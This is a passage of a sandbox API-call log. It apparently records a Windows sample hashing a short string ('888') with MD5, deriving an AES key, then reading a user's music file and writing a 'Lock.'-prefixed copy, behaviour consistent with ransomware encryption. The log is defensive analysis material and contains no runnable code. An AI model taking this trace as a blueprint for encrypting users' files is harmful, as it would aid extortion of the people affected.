lpsz="A2300C04232") returned 0xb [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0207.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaacc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0207.921] CryptCreateHash (in: hProv=0xa7ba28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0207.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0207.921] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0207.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0207.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.922] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0207.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaac90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0207.922] CryptHashData (hHash=0x9e1cb8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.922] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.922] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0207.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.923] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0207.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab080, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.923] CryptDeriveKey (in: hProv=0xa7ba28, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.923] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.923] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.923] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.923] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.923] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0207.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0207.923] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0207.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav" (normalized: "c:\\users\\fd1hvy\\music\\pfab.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0207.925] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.925] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0207.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0207.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0207.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0207.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0207.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.926] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0207.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0207.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0207.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0207.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.pFAB.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.pfab.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0207.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0207.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0207.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0207.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0207.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0207.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e3020 [0207.933] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0207.933] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0207.936] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x1605, lpOverlapped=0x0) returned 1 [0207.936] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0207.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0207.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11605) returned 0x2aae878 [0207.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e3020 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0207.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0207.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11605) returned 0x2abfe88 [0207.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0207.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0207.941] 